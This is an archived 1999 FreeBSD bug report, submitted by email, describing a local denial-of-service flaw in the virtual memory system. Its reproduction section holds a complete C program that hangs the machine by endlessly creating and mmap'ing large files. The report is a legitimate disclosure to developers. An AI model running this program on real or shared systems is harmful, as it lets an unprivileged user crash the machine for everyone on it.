Date: Sat, 30 Oct 1999 16:00:45 -0700 (PDT) From: sobomax@altavista.net To: freebsd-gnats-submit@freebsd.org Subject: kern/14614: VM DoS attack (with exploit attached) Message-ID: <19991030230045.F0D8014BF2@hub.freebsd.org>
next in thread | raw e-mail | index | archive | help
>Number: 14614
>Category: kern
>Synopsis: VM DoS attack (with exploit attached)
>Confidential: no
>Severity: critical
>Priority: high
>Responsible: freebsd-bugs
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: sw-bug
>Submitter-Id: current-users
>Arrival-Date: Sat Oct 30 16:10:00 PDT 1999
>Closed-Date:
>Last-Modified:
>Originator: Maxim Sobolev
>Release: 4.0-CURRENT, 3.3-STABLE
>Organization:
Vega International Capital
>Environment:
>Description:
Any unpriveleged user with shell access and 10-20MB of disk quiota
can hang FreeBSD machine using following program. This program is simply
mmap'ing large files without unmap'ing them. I have not found a way to
prevent this attack neither using disk quotas nor using memory limits in
login.conf.
I'm personally tested it works on 4.0, however others reports that 3.3
is also affected.
>How-To-Repeat:
#include <sys/types.h>
#include <sys/mman.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
main()
{
int fd;
int i;
int len=1024*1024*10; /*ie 10Mbytes*/
caddr_t addr;
char ttt[80];
for (i=0;;i++)
{
sprintf (ttt,"%d",i);
fd=open(ttt,O_CREAT|O_RDWR,0666);
if (fd<0)
{
printf("open error %ld\n",errno);
exit(1);
}
lseek(fd,len-1,SEEK_SET);
write(fd,"",1);
addr=mmap(0,len,PROT_READ|PROT_WRITE,MAP_SHARED,fd,0);
if (addr==MAP_FAILED)
{
printf("mmap error %ld",errno);
exit(1);
}
close(fd);
memset(addr,'x',len);
}
}
>Fix:
>Release-Note:
>Audit-Trail:
>Unformatted:
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-bugs" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?19991030230045.F0D8014BF2>